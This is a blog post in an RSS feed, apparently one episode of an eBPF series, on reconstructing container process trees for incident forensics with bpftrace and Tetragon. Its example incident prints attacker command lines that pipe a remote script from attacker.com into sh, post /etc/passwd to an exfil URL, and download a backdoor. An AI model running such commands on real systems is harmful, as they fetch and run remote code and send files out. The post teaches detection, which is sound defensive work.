<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Linux Archives - Linuxcent</title>
	<atom:link href="https://linuxcent.com/tag/linux/feed/" rel="self" type="application/rss+xml" />
	<link>https://linuxcent.com/tag/linux/</link>
	<description>Infrastructure security, from the kernel up.</description>
	<lastBuildDate>Wed, 13 May 2026 15:36:58 +0000</lastBuildDate>
	<language>en-US</language>
	<sy:updatePeriod>
	hourly	</sy:updatePeriod>
	<sy:updateFrequency>
	1	</sy:updateFrequency>
	<generator>https://wordpress.org/?v=7.0</generator>

<image>
	<url>https://linuxcent.com/wp-content/uploads/2026/04/favicon-512x512-1-150x150.png</url>
	<title>Linux Archives - Linuxcent</title>
	<link>https://linuxcent.com/tag/linux/</link>
	<width>32</width>
	<height>32</height>
</image> 
<site xmlns="com-wordpress:feed-additions:1">211632295</site>	<item>
		<title>Process Lineage — Reconstructing What Happened After the Fact</title>
		<link>https://linuxcent.com/ebpf-process-lineage-incident-response/</link>
					<comments>https://linuxcent.com/ebpf-process-lineage-incident-response/#respond</comments>
		
		<dc:creator><![CDATA[Vamshi Krishna Santhapuri]]></dc:creator>
		<pubDate>Thu, 18 Jun 2026 02:00:00 +0000</pubDate>
				<category><![CDATA[eBPF]]></category>
		<category><![CDATA[Forensics]]></category>
		<category><![CDATA[Incident Response]]></category>
		<category><![CDATA[kprobe]]></category>
		<category><![CDATA[Kubernetes]]></category>
		<category><![CDATA[Linux]]></category>
		<category><![CDATA[Process Lineage]]></category>
		<category><![CDATA[Security]]></category>
		<guid isPermaLink="false">https://linuxcent.com/?p=1842</guid>

					<description><![CDATA[<p><span class="span-reading-time rt-reading-time" style="display: block;"><span class="rt-label rt-prefix">Reading Time: </span> <span class="rt-time"> 9</span> <span class="rt-label rt-postfix">minutes</span></span>Reconstruct the full process tree of a compromised container — what it spawned, what files it touched, what connections it made — using eBPF kprobe hooks. Even after the process exits.</p>
<p>The post <a href="https://linuxcent.com/ebpf-process-lineage-incident-response/">Process Lineage — Reconstructing What Happened After the Fact</a> appeared first on <a href="https://linuxcent.com">Linuxcent</a>.</p>
]]></description>
										<content:encoded><![CDATA[<span class="span-reading-time rt-reading-time" style="display: block;"><span class="rt-label rt-prefix">Reading Time: </span> <span class="rt-time"> 9</span> <span class="rt-label rt-postfix">minutes</span></span><style>
/* Code panels: dark background; position:relative anchors the absolutely positioned badge and copy button. */
pre{position:relative;background:#1e1e1e;color:#d4d4d4;
    padding:16px 16px 16px 20px;border-radius:6px;overflow-x:auto;
    font-family:'JetBrains Mono','Fira Code','Cascadia Code',Consolas,'Courier New',monospace;
    font-size:.88em;line-height:1.6;border-left:4px solid #555}
/* Inline code gets a light chip; code nested inside pre drops the chip and inherits the panel colours. */
code{background:#f4f4f4;padding:2px 5px;border-radius:3px;font-size:.9em}
pre code{background:transparent;padding:0;color:inherit}
/* Left-border accent per language family, keyed on the data-lang attribute of the pre element. */
pre[data-lang="bash"],pre[data-lang="sh"],
pre[data-lang="shell"],pre[data-lang="zsh"]{border-left-color:#4ec9b0}
pre[data-lang="yaml"],pre[data-lang="json"],
pre[data-lang="toml"],pre[data-lang="xml"]{border-left-color:#569cd6}
pre[data-lang="python"],pre[data-lang="go"],pre[data-lang="rust"],
pre[data-lang="java"],pre[data-lang="c"],pre[data-lang="cpp"]{border-left-color:#c586c0}
pre[data-lang="text"],pre[data-lang="output"],
pre[data-lang="console"]{border-left-color:#888}
/* Copy button: pinned top-right and transparent until revealed. */
.lc-copy-btn{position:absolute;top:8px;right:8px;background:#2d2d2d;color:#ccc;
    border:1px solid #444;border-radius:4px;padding:3px 9px;font-size:.75em;
    font-family:system-ui,sans-serif;cursor:pointer;opacity:0;
    transition:opacity .15s,background .15s;line-height:1.6}
/* Reveal on hover AND on focus, so a keyboard user who tabs to the button can see it. */
pre:hover .lc-copy-btn,.lc-copy-btn:focus{opacity:1}
.lc-copy-btn:hover{background:#3a3a3a;color:#fff}
.lc-copy-btn.copied{color:#4ec9b0;border-color:#4ec9b0}
/* Language badge: decorative label at top-left; pointer-events:none keeps it from intercepting clicks or text selection. */
.lc-lang-badge{position:absolute;top:8px;left:20px;font-family:system-ui,sans-serif;
    font-size:.7em;color:#666;text-transform:uppercase;letter-spacing:.04em;
    line-height:1;pointer-events:none;opacity:0;transition:opacity .15s}
pre:hover .lc-lang-badge{opacity:1}
/* Article tables: collapsed borders, shaded header row, zebra striping on even rows. */
table{border-collapse:collapse;width:100%;margin:16px 0}
th,td{border:1px solid #ddd;padding:10px 14px;text-align:left}
th{background:#f0f0f0;font-weight:600}
tr:nth-child(even){background:#fafafa}
</style>
<p><script>
(function(){
  // Adds a language badge and a "Copy" button to every pre element on the page.
  // The window-level flag makes repeated inclusions of this script a no-op.
  if(window.__lcCodeEnhanced)return;
  window.__lcCodeEnhanced=true;
  // How long a status label stays on the button before it reverts to "Copy".
  var RESET_MS=2000;
  // Decorates each pre: sets data-lang from the code element's language-* class,
  // inserts the badge when a language is known, and appends the copy button.
  function enhance(){
    document.querySelectorAll('pre').forEach(function(pre){
      var code=pre.querySelector('code');
      var lang='';
      if(code){var m=(code.className||'').match(/language-(\S+)/);if(m)lang=m[1].toLowerCase();}
      if(lang){
        pre.setAttribute('data-lang',lang);
        var badge=document.createElement('span');
        badge.className='lc-lang-badge';
        badge.textContent=lang;
        pre.insertBefore(badge,pre.firstChild);
      }
      var btn=document.createElement('button');
      // Explicit type: a button defaults to type=submit and would submit an enclosing form.
      btn.type='button';
      btn.className='lc-copy-btn';
      btn.textContent='Copy';
      btn.setAttribute('aria-label','Copy code to clipboard');
      pre.appendChild(btn);
      btn.addEventListener('click',function(){
        var text=textOf(pre,code);
        // The async Clipboard API is only used in secure contexts; otherwise fall back.
        if(navigator.clipboard&&window.isSecureContext){
          navigator.clipboard.writeText(text).then(function(){ok(btn);}).catch(function(){fb(text,btn);});
        }else{fb(text,btn);}
      });
    });
  }
  // Returns the text to copy. Prefers the code element; for a bare pre it reads a
  // detached clone with the injected button/badge removed, so the "Copy" label
  // itself never ends up on the clipboard.
  function textOf(pre,code){
    if(code)return code.innerText;
    var clone=pre.cloneNode(true);
    clone.querySelectorAll('.lc-copy-btn,.lc-lang-badge').forEach(function(el){el.parentNode.removeChild(el);});
    return clone.textContent;
  }
  // Shows a temporary label (and optional CSS class) on the button, then restores "Copy".
  function flash(btn,label,cls){
    btn.textContent=label;
    if(cls)btn.classList.add(cls);
    setTimeout(function(){btn.textContent='Copy';if(cls)btn.classList.remove(cls);},RESET_MS);
  }
  function ok(btn){flash(btn,'Copied!','copied');}
  function fail(btn){flash(btn,'✗ Failed');}
  // Fallback copy through a hidden textarea and document.execCommand('copy').
  // execCommand signals refusal by returning false rather than throwing, so the
  // return value decides between the success and failure labels.
  function fb(text,btn){
    var ta=document.createElement('textarea');
    var copied=false;
    try{
      ta.value=text;
      ta.style.cssText='position:fixed;left:-9999px;top:-9999px;opacity:0';
      document.body.appendChild(ta);
      ta.select();
      copied=document.execCommand('copy');
    }catch(e){
      copied=false;
    }finally{
      // Always detach the helper textarea, including when select/execCommand throws.
      if(ta.parentNode)ta.parentNode.removeChild(ta);
    }
    if(copied){ok(btn);}else{fail(btn);}
  }
  // Run immediately if the DOM is already parsed, otherwise wait for it.
  if(document.readyState==='loading'){document.addEventListener('DOMContentLoaded',enhance);}else{enhance();}
})();
</script></p>
<p><em>eBPF: From Kernel to Cloud, Episode 13</em><br />
<a href="/what-is-ebpf/">What Is eBPF?</a> · <a href="/ebpf-verifier-safety/">The BPF Verifier</a> · <a href="/ebpf-vs-kernel-modules/">eBPF vs Kernel Modules</a> · <a href="/ebpf-program-types/">eBPF Program Types</a> · <a href="/ebpf-maps-persistent-data/">eBPF Maps</a> · <a href="/co-re-libbpf-write-once/">CO-RE and libbpf</a> · <a href="/xdp-network-fast-path/">XDP</a> · <a href="/tc-ebpf-pod-network-policy/">TC eBPF</a> · <a href="/bpftrace-kernel-observability/">bpftrace</a> · <a href="/network-flow-observability-ebpf/">Network Flow Observability</a> · <a href="/dns-kernel-observability/">DNS Observability</a> · <a href="/lsm-ebpf-tetragon-kernel-enforcement/">LSM and Tetragon</a> · <strong>Process Lineage</strong></p>
<hr />
<p style="font-size:0.72em;font-weight:700;letter-spacing:0.12em;color:#f59e0b;text-transform:uppercase;margin:2em 0 0.75em 0;text-align:center;">Architecture Overview</p>
<figure class="wp-block-image size-full" style="margin:0 0 0.5em 0;">
<img fetchpriority="high" decoding="async" width="2400" height="2012" src="https://linuxcent.com/wp-content/uploads/2026/05/ep13-process-lineage-og-2.png" alt="eBPF Process Lineage — kernel-level process ancestry tracking for runtime security forensics" class="wp-image-2122" style="width:100%;height:auto;display:block;border-radius:8px;" srcset="https://linuxcent.com/wp-content/uploads/2026/05/ep13-process-lineage-og-2.png 2400w, https://linuxcent.com/wp-content/uploads/2026/05/ep13-process-lineage-og-2-300x252.png 300w, https://linuxcent.com/wp-content/uploads/2026/05/ep13-process-lineage-og-2-1024x858.png 1024w, https://linuxcent.com/wp-content/uploads/2026/05/ep13-process-lineage-og-2-768x644.png 768w, https://linuxcent.com/wp-content/uploads/2026/05/ep13-process-lineage-og-2-1536x1288.png 1536w, https://linuxcent.com/wp-content/uploads/2026/05/ep13-process-lineage-og-2-2048x1717.png 2048w" sizes="(max-width: 2400px) 100vw, 2400px" /><figcaption style="text-align:center;font-size:0.85em;color:#6b7280;margin-top:0.75em;">eBPF tracks every exec() and fork() in the kernel — reconstructing the full process tree for forensic attribution.</figcaption></figure>
<hr style="border:none;border-top:1px solid #e5e7eb;margin:0.5em 0 2em 0;"/>
<h2 id="tldr">TL;DR</h2>
<ul>
<li>Process lineage with eBPF hooks <code class="" data-line="">fork</code> and <code class="" data-line="">exec</code> at the kernel level — building a tamper-resistant record of every process spawned, tied to its parent, pod, namespace, and timestamp<br />
  <em>(kprobe on fork/exec = an eBPF program that fires every time the kernel&#8217;s <code class="" data-line="">fork()</code> or <code class="" data-line="">execve()</code> system call runs, capturing process name, PID, parent PID, and arguments before any userspace observer could be bypassed)</em></li>
<li>Application logs and container stdout can be deleted or suppressed by a compromised process; kernel-level process events written to a ringbuf and exported to a persistent store cannot</li>
<li>The kernel&#8217;s <code class="" data-line="">task_struct</code> contains the complete process identity: PID, PPID, UID, GID, process name, capabilities, and cgroup (which maps directly to a pod)</li>
<li>Tetragon and Falco both build process lineage from kernel events; the difference is storage — Tetragon persists a kernel-side cache of the process tree in BPF maps, Falco reconstructs lineage from an audit log stream</li>
<li>Reconstructing an incident from process lineage requires: who spawned the attacker&#8217;s process, what did it execute, what files did it open, what connections did it make — all correlated by PID and timestamp</li>
<li>Production caution: process events on a busy node can generate high ringbuf write volume; filter aggressively by namespace/cgroup at the eBPF level, not in userspace</li>
</ul>
<hr />
<p>EP12 showed how LSM hooks enforce at the syscall boundary — preventing operations before they complete. Process lineage with eBPF is the complementary capability: when an attacker bypasses enforcement, or when you need to understand what happened before the policy was in place, the kernel-level process record is how you reconstruct the attack chain. This episode covers how that record is built and how to read it.</p>
<h2 id="quick-check-what-process-events-is-your-cluster-already-recording">Quick Check: What Process Events Is Your Cluster Already Recording?</h2>
<pre><code class="" data-line=""># On any cluster node — verify exec tracing is available
bpftrace -e &#039;
tracepoint:syscalls:sys_enter_execve {
    printf(&quot;%-20s %-6d %s\n&quot;, comm, pid, str(args-&gt;filename));
}
interval:s:10 { exit(); }&#039;

# Expected output:
# containerd-shim     1203   /usr/bin/runc
# runc                1204   /usr/sbin/runc
# sh                  1205   /bin/sh
# node                1842   /usr/local/bin/node
# kube-proxy          2091   /usr/local/bin/kube-proxy
</code></pre>
<pre><code class="" data-line=""># If Tetragon is installed — view the live process lineage stream
kubectl exec -n kube-system \
  $(kubectl get pod -n kube-system -l app.kubernetes.io/name=tetragon -o name | head -1) \
  -- tetra getevents --event-types PROCESS_EXEC | head -20
</code></pre>
<p>Sample Tetragon output:</p>
<pre><code class="" data-line="">{
  &quot;process_exec&quot;: {
    &quot;process&quot;: {
      &quot;pid&quot;: 18293,
      &quot;binary&quot;: &quot;/bin/sh&quot;,
      &quot;arguments&quot;: &quot;-c health-check.sh&quot;,
      &quot;start_time&quot;: &quot;2026-04-22T09:14:03.412Z&quot;,
      &quot;pod&quot;: {&quot;name&quot;: &quot;my-app-6d4f9-xk2p1&quot;, &quot;namespace&quot;: &quot;production&quot;},
      &quot;parent_pid&quot;: 18201
    },
    &quot;parent&quot;: {
      &quot;pid&quot;: 18201,
      &quot;binary&quot;: &quot;/usr/local/bin/my-app&quot;,
      &quot;pod&quot;: {&quot;name&quot;: &quot;my-app-6d4f9-xk2p1&quot;, &quot;namespace&quot;: &quot;production&quot;}
    }
  }
}
</code></pre>
<p>Each event has the process, its parent, the pod, the namespace, and the full binary path. That&#8217;s the raw material for process lineage reconstruction.</p>
<blockquote>
<p><strong>Not running Tetragon?</strong> Plain bpftrace on the node gives you the same raw data without Kubernetes enrichment — you get PIDs and process names but not pod names or namespaces without the <code class="" data-line="">/proc/&lt;pid&gt;/cgroup</code> mapping step. For incident reconstruction, the Tetragon-enriched stream is significantly more useful because pod attribution is baked in at capture time, not reconstructed afterward.</p>
</blockquote>
<hr />
<p>A container in the <code class="" data-line="">payments</code> namespace was reported compromised. The security team&#8217;s automated response had already restarted the pod — the attacker&#8217;s process was gone. The container&#8217;s filesystem had been reset to the image. The application logs for that pod were deleted when the pod restarted. The Kubernetes event log showed the pod restart but nothing about what had run inside it.</p>
<p>Three questions, no answers yet:<br />
1. What spawned the attacker&#8217;s process? (was it a remote code execution in the app, or a misconfigured exec?)<br />
2. What did the attacker run after getting in? (what did they download, execute, touch?)<br />
3. What network connections did they make? (where did data go, if anywhere?)</p>
<p>The answers were in Tetragon&#8217;s process event export — captured at the kernel level before the pod was restarted, stored in the observability backend, and queryable by pod name and time window. The kernel had seen every exec, every fork, every file open. The restart didn&#8217;t touch that record.</p>
<p>The lineage showed:</p>
<pre><code class="" data-line="">my-app (PID 18201)
  └── sh -c &quot;curl http://attacker.com/payload.sh | sh&quot;  (PID 18293)
        └── sh payload.sh  (PID 18294)
              ├── cat /etc/passwd  (PID 18295)
              ├── curl http://attacker.com/exfil -d @/etc/passwd  (PID 18296)
              └── wget -O /tmp/.x http://attacker.com/backdoor  (PID 18297)
                    └── chmod +x /tmp/.x  (PID 18298)
</code></pre>
<p>Five minutes of attacker activity, fully reconstructed, from a pod that no longer existed.</p>
<hr />
<h2 id="how-the-kernel-tracks-process-identity">How the Kernel Tracks Process Identity</h2>
<p>Every process in Linux is represented by a <code class="" data-line="">task_struct</code> — the kernel&#8217;s internal data structure for a running process. It contains everything the kernel knows about that process.</p>
<blockquote>
<p><strong><code class="" data-line="">task_struct</code></strong> — the kernel&#8217;s primary data structure for a process. Contains: PID, PPID, UID, GID, process name (comm, 15 chars), open file descriptors, memory mappings, namespace references, cgroup membership, capabilities, and a pointer to the parent <code class="" data-line="">task_struct</code>. When bpftrace uses <code class="" data-line="">curtask</code>, it&#8217;s returning a pointer to the current process&#8217;s <code class="" data-line="">task_struct</code>. Reading <code class="" data-line="">curtask-&gt;real_parent-&gt;tgid</code> gives you the parent&#8217;s PID — the foundation of process lineage.</p>
</blockquote>
<p>When a process calls <code class="" data-line="">fork()</code>, the kernel:<br />
1. Allocates a new <code class="" data-line="">task_struct</code> for the child<br />
2. Copies the parent&#8217;s <code class="" data-line="">task_struct</code> fields into the child<br />
3. Sets the child&#8217;s <code class="" data-line="">real_parent</code> pointer to the parent&#8217;s <code class="" data-line="">task_struct</code><br />
4. Assigns the child a new PID<br />
5. Returns the child&#8217;s PID to the parent, and 0 to the child</p>
<p>When the child calls <code class="" data-line="">execve()</code>, the kernel:<br />
1. Validates the binary (file permission and capability checks, LSM hooks)<br />
2. Replaces the process&#8217;s memory image with the new binary<br />
3. Updates <code class="" data-line="">task_struct-&gt;comm</code> with the new process name<br />
4. The PID does not change — <code class="" data-line="">execve</code> replaces the process image but not the process identity</p>
<p>This <code class="" data-line="">fork</code> → <code class="" data-line="">exec</code> sequence is how every shell command works: the shell forks a child, the child execs the command. eBPF hooks on both events, correlated by PID and parent PID, give you the complete tree.</p>
<hr />
<h2 id="building-the-process-tree-with-kprobes">Building the Process Tree with kprobes</h2>
<p>The two core hooks for process lineage:</p>
<pre><code class="" data-line=""># Every fork — capture parent/child relationship
bpftrace -e &#039;
tracepoint:syscalls:sys_exit_clone {
    if (args-&gt;ret &gt; 0) {
        // args-&gt;ret is the new child PID as seen from the parent
        printf(&quot;FORK parent=%-6d child=%-6d parent_comm=%-20s\n&quot;,
               pid, args-&gt;ret, comm);
    }
}&#039;
</code></pre>
<pre><code class="" data-line=""># Every exec — capture what binary replaced the process image
bpftrace -e &#039;
tracepoint:syscalls:sys_enter_execve {
    printf(&quot;EXEC pid=%-6d ppid=%-6d binary=%-40s args=%s\n&quot;,
           pid,
           curtask-&gt;real_parent-&gt;tgid,
           str(args-&gt;filename),
           str(*args-&gt;argv));
}&#039;
</code></pre>
<p>Combined output (30 seconds, simplified):</p>
<pre><code class="" data-line="">FORK parent=18201 child=18293  parent_comm=my-app
EXEC pid=18293 ppid=18201 binary=/bin/sh              args=sh -c curl http://...
FORK parent=18293 child=18294  parent_comm=sh
EXEC pid=18294 ppid=18293 binary=/bin/sh              args=sh payload.sh
FORK parent=18294 child=18295  parent_comm=sh
EXEC pid=18295 ppid=18294 binary=/bin/cat             args=cat /etc/passwd
FORK parent=18294 child=18296  parent_comm=sh
EXEC pid=18296 ppid=18294 binary=/usr/bin/curl        args=curl http://attacker.com/exfil -d @/etc/passwd
</code></pre>
<p>Each line is a kernel event. The parent/child PID chain is the tree. Rendered:</p>
<pre><code class="" data-line="">my-app (18201)
  └── sh (18293) — &quot;sh -c curl http://attacker.com/payload.sh | sh&quot;
        └── sh (18294) — &quot;sh payload.sh&quot;
              ├── cat (18295) — &quot;/etc/passwd&quot;
              └── curl (18296) — &quot;http://attacker.com/exfil -d @/etc/passwd&quot;
</code></pre>
<p>This tree is constructed entirely from kernel events. No application logging. No container stdout. No agent inside the container.</p>
<hr />
<h2 id="how-tetragon-stores-the-process-tree-in-bpf-maps">How Tetragon Stores the Process Tree in BPF Maps</h2>
<p>bpftrace&#8217;s approach above produces an event stream — a log you reconstruct manually. Tetragon takes a different approach: it maintains a live process tree in BPF maps, updated on every fork and exec event, persistently queryable.</p>
<pre><code class="" data-line="">Kernel events (kprobe on clone, execve, exit)
      ↓
Tetragon eBPF programs
      ↓
Write to BPF_MAP_TYPE_HASH: process_cache
      key: PID
      value: {binary, args, start_time, parent_pid, pod_name, namespace, uid, gid, caps}
      ↓
Tetragon userspace agent
      reads process_cache on events
      enriches with Kubernetes pod metadata (from informer cache)
      exports to gRPC stream → observability backend
</code></pre>
<blockquote>
<p><strong><code class="" data-line="">task_struct</code> in BPF maps</strong> — Tetragon doesn&#8217;t store the raw <code class="" data-line="">task_struct</code> pointer in its maps (pointers are not stable across process lifetime). Instead, it stores a snapshot of the relevant fields (PID, binary path, arguments, capabilities, cgroup path, start time) at the moment of the exec event, keyed by PID. When the process exits, the entry is kept in the cache for a configurable window to allow late-arriving events (like file closes or connection terminations) to be correlated back to the originating process.</p>
</blockquote>
<p>To inspect Tetragon&#8217;s process cache directly:</p>
<pre><code class="" data-line=""># Find the Tetragon process cache map
bpftool map list | grep process_cache

# 112: hash  name process_cache  flags 0x0
#      key 4B  value 256B  max_entries 65536  memlock 16777216B

# Dump a few entries
bpftool map dump id 112 | head -60

# [{
#     &quot;key&quot;: 18293,                           # ← PID
#     &quot;value&quot;: {
#         &quot;binary&quot;: &quot;/bin/sh&quot;,
#         &quot;args&quot;: &quot;sh -c curl http://...&quot;,
#         &quot;pid&quot;: 18293,
#         &quot;ppid&quot;: 18201,
#         &quot;uid&quot;: 1000,
#         &quot;start_time&quot;: 1745296443,
#         &quot;cgroup&quot;: &quot;kubepods/burstable/pod3f8a21bc/.../payments&quot;
#     }
# }]
</code></pre>
<p>The <code class="" data-line="">cgroup</code> field maps directly to the pod — same path as <code class="" data-line="">/proc/&lt;pid&gt;/cgroup</code> but captured at exec time and stored in kernel space.</p>
<hr />
<h2 id="correlating-files-and-connections-to-the-process-tree">Correlating Files and Connections to the Process Tree</h2>
<p>Process lineage is most useful when combined with the file access and network connection events from the same process. Tetragon&#8217;s TracingPolicy supports this multi-event correlation natively:</p>
<pre><code class="" data-line="">apiVersion: cilium.io/v1alpha1
kind: TracingPolicy
metadata:
  name: observe-process-lineage
spec:
  kprobes:
    - call: &quot;security_inode_permission&quot;
      syscall: false
      args:
        - index: 0
          type: &quot;inode&quot;
      selectors:
        - matchNamespaces:
            - namespace: Net
              operator: &quot;NotIn&quot;
              values: [&quot;host_ns&quot;]    # exclude host network namespace
          matchActions:
            - action: Post   # audit: log but don&#039;t block
    - call: &quot;tcp_connect&quot;
      syscall: false
      args:
        - index: 0
          type: &quot;sock&quot;
      selectors:
        - matchActions:
            - action: Post
</code></pre>
<p>With this policy active, Tetragon emits events for both file access and TCP connections, each carrying the full process context (PID, binary, pod, parent). Correlated by PID and timestamp:</p>
<pre><code class="" data-line="">tetra getevents | jq &#039;select(.process_kprobe.function_name == &quot;tcp_connect&quot;) |
  {pid: .process_kprobe.process.pid,
   binary: .process_kprobe.process.binary,
   pod: .process_kprobe.process.pod.name,
   dst: .process_kprobe.args[0].sock_arg.daddr}&#039;
</code></pre>
<p>Sample output:</p>
<pre><code class="" data-line="">{&quot;pid&quot;: 18296, &quot;binary&quot;: &quot;/usr/bin/curl&quot;, &quot;pod&quot;: &quot;my-app-6d4f9-xk2p1&quot;, &quot;dst&quot;: &quot;93.184.216.34&quot;}
{&quot;pid&quot;: 18297, &quot;binary&quot;: &quot;/usr/bin/wget&quot;, &quot;pod&quot;: &quot;my-app-6d4f9-xk2p1&quot;, &quot;dst&quot;: &quot;93.184.216.34&quot;}
</code></pre>
<p>PID 18296 and 18297 both connected to the same IP. Cross-reference with the process tree: those are the <code class="" data-line="">curl</code> and <code class="" data-line="">wget</code> spawned by the attacker&#8217;s payload script. The destination IP is the attacker&#8217;s infrastructure. The timeline is milliseconds-precise because the events are timestamped by the kernel at the hook point.</p>
<hr />
<h2 id="building-process-lineage-without-tetragon">Building Process Lineage Without Tetragon</h2>
<p>If you&#8217;re not running Tetragon, you can build a basic process lineage recorder with bpftrace that writes to a file:</p>
<pre><code class="" data-line=""># Record all exec events to a file — run in the background on the node
bpftrace -e &#039;
tracepoint:syscalls:sys_enter_execve {
    printf(&quot;%llu EXEC pid=%-6d ppid=%-6d binary=%s\n&quot;,
           nsecs, pid, curtask-&gt;real_parent-&gt;tgid, str(args-&gt;filename));
}
tracepoint:sched:sched_process_exit {
    printf(&quot;%llu EXIT pid=%-6d comm=%s\n&quot;, nsecs, pid, comm);
}
&#039; &gt; /var/log/process-lineage.log &amp;

# Tail the log for real-time observation
tail -f /var/log/process-lineage.log
</code></pre>
<p>Sample output:</p>
<pre><code class="" data-line="">1745296443123456789 EXEC pid=18293 ppid=18201 binary=/bin/sh
1745296443234567890 EXEC pid=18294 ppid=18293 binary=/bin/sh
1745296443345678901 EXEC pid=18295 ppid=18294 binary=/bin/cat
1745296443456789012 EXIT pid=18295 comm=cat
1745296443567890123 EXEC pid=18296 ppid=18294 binary=/usr/bin/curl
1745296443678901234 EXIT pid=18293 comm=sh
</code></pre>
<p>This file survives pod restarts because it&#8217;s on the node, not in the container. After the pod is restarted, the process lineage record is still on disk. You reconstruct the tree by grouping by <code class="" data-line="">ppid</code> and ordering by timestamp.</p>
<hr />
<h2 id="production-gotchas"><img src="https://s.w.org/images/core/emoji/17.0.2/72x72/26a0.png" alt="⚠" class="wp-smiley" style="height: 1em; max-height: 1em;" /> Production Gotchas</h2>
<p><strong>Ringbuf saturation on high-process-churn nodes.</strong> Nodes running serverless workloads or short-lived batch jobs may spawn thousands of processes per minute. Hooking exec on every process at that rate generates a high ringbuf write volume. Filter at the eBPF level by cgroup (namespace) rather than in userspace — sending events to userspace only to discard them wastes ringbuf space and CPU. Tetragon&#8217;s namespace selector does this filtering in the eBPF program before the write.</p>
<p><strong>The 15-character <code class="" data-line="">comm</code> truncation.</strong> The <code class="" data-line="">comm</code> field in <code class="" data-line="">task_struct</code> is limited to 15 characters (plus null terminator). Process names longer than 15 characters are truncated. <code class="" data-line="">bpftrace</code>&#8217;s <code class="" data-line="">comm</code> built-in has the same limit. For the full binary path, read from <code class="" data-line="">execve</code>&#8217;s <code class="" data-line="">filename</code> argument at the tracepoint, not from <code class="" data-line="">comm</code>.</p>
<p><strong>PID reuse.</strong> Linux PIDs are reused after a process exits. In a high-churn environment, a PID you recorded as an attacker process may be reassigned to a legitimate process seconds later. Always pair PIDs with start time and cgroup path when correlating across events. Tetragon&#8217;s process cache keys on PID + start time to handle this.</p>
<p><strong>Exec chains lose argument history.</strong> When <code class="" data-line="">execve</code> replaces the process image, <code class="" data-line="">task_struct-&gt;comm</code> changes but the PID does not. If the attacker&#8217;s shell runs <code class="" data-line="">exec bash</code> to replace itself with a less suspicious binary name, the exec event captures the new binary — but the PID lineage still shows the parent correctly. Don&#8217;t rely on <code class="" data-line="">comm</code> alone for process identity; always track the binary path from the exec event.</p>
<p><strong>Process events don&#8217;t capture file content.</strong> You see that <code class="" data-line="">/bin/cat /etc/passwd</code> ran. You don&#8217;t see what was in <code class="" data-line="">/etc/passwd</code> at that moment unless you also capture file open/read events. Tetragon&#8217;s <code class="" data-line="">security_inode_permission</code> hook tells you which files were accessed; capturing their content requires additional hooks on <code class="" data-line="">vfs_read</code> with buffer capture, which is significantly higher overhead and requires careful data handling for sensitive files.</p>
<hr />
<h2 id="quick-reference">Quick Reference</h2>
<table>
<thead>
<tr>
<th>What you want</th>
<th>Command</th>
</tr>
</thead>
<tbody>
<tr>
<td>Live exec trace (bpftrace)</td>
<td><code class="" data-line="">bpftrace -e &#039;tracepoint:syscalls:sys_enter_execve { printf(...) }&#039;</code></td>
</tr>
<tr>
<td>Fork + exec tree</td>
<td>Combine <code class="" data-line="">sys_exit_clone</code> + <code class="" data-line="">sys_enter_execve</code> traces, correlate by pid/ppid</td>
</tr>
<tr>
<td>Tetragon process events</td>
<td><code class="" data-line="">tetra getevents --event-types PROCESS_EXEC</code></td>
</tr>
<tr>
<td>Tetragon file + network</td>
<td><code class="" data-line="">tetra getevents --event-types PROCESS_KPROBE</code></td>
</tr>
<tr>
<td>Process cache map</td>
<td><code class="" data-line="">bpftool map list | grep process_cache</code> → <code class="" data-line="">bpftool map dump id N</code></td>
</tr>
<tr>
<td>Map PID to pod</td>
<td><code class="" data-line="">cat /proc/&lt;pid&gt;/cgroup</code> → extract pod UID</td>
</tr>
<tr>
<td>Process exit events</td>
<td><code class="" data-line="">tracepoint:sched:sched_process_exit</code></td>
</tr>
</tbody>
</table>
<table>
<thead>
<tr>
<th>Process event</th>
<th>Kernel hook</th>
</tr>
</thead>
<tbody>
<tr>
<td>New process spawned</td>
<td><code class="" data-line="">tracepoint:syscalls:sys_exit_clone</code> (<code class="" data-line="">args-&gt;ret</code> &gt; 0 = child PID)</td>
</tr>
<tr>
<td>Binary executed</td>
<td><code class="" data-line="">tracepoint:syscalls:sys_enter_execve</code></td>
</tr>
<tr>
<td>Process exited</td>
<td><code class="" data-line="">tracepoint:sched:sched_process_exit</code></td>
</tr>
<tr>
<td>File opened</td>
<td><code class="" data-line="">tracepoint:syscalls:sys_enter_openat</code></td>
</tr>
<tr>
<td>Network connect</td>
<td><code class="" data-line="">kprobe:tcp_connect</code></td>
</tr>
<tr>
<td>DNS query</td>
<td><code class="" data-line="">tracepoint:syscalls:sys_enter_sendto</code> (port 53)</td>
</tr>
</tbody>
</table>
<hr />
<h2 id="key-takeaways">Key Takeaways</h2>
<ul>
<li>Process lineage with eBPF hooks <code class="" data-line="">fork</code> and <code class="" data-line="">exec</code> at the kernel level — every process spawned on a node is recorded with its parent PID, binary path, arguments, and container context, regardless of what the container does to suppress application logs</li>
<li>The kernel&#8217;s <code class="" data-line="">task_struct</code> is the authoritative source of process identity; eBPF programs read it at hook time and snapshot the relevant fields into BPF maps before the process can exit or be killed</li>
<li>Tetragon maintains a live process tree in BPF maps, correlates it with Kubernetes metadata, and makes it queryable by pod/namespace — the record persists after the pod is restarted</li>
<li>Incident reconstruction requires correlating process lineage with file access events and network connection events by PID and timestamp — eBPF provides all three event streams from the same kernel attachment mechanism</li>
<li>PID reuse is a real concern in high-churn environments; always pair PIDs with start time and cgroup path when correlating across events</li>
<li>Kernel-level process events cannot be suppressed by a compromised container process — an attacker with root inside the container still cannot prevent bpftrace or Tetragon running on the host from recording their syscalls</li>
</ul>
<hr />
<h2 id="whats-next">What&#8217;s Next</h2>
<p>EP14 is the payoff episode for the entire series arc so far. You&#8217;ve seen programs load (EP04), maps hold state (EP05), CO-RE keep programs portable (EP06), XDP and TC enforce at the network layer (EP07, EP08), bpftrace ask one-off questions (EP09), and the observability stack collect flow, DNS, and process data continuously (EP10, EP11, EP12, EP13).</p>
<p>EP14 synthesises all of it into four commands that tell you everything about any cluster you&#8217;ve never seen before — any eBPF-based tool, any vendor, any configuration. The audit playbook is what you run in the first 10 minutes when you inherit a cluster and need to understand what&#8217;s enforcing policy at the kernel level before you can trust anything it tells you.</p>
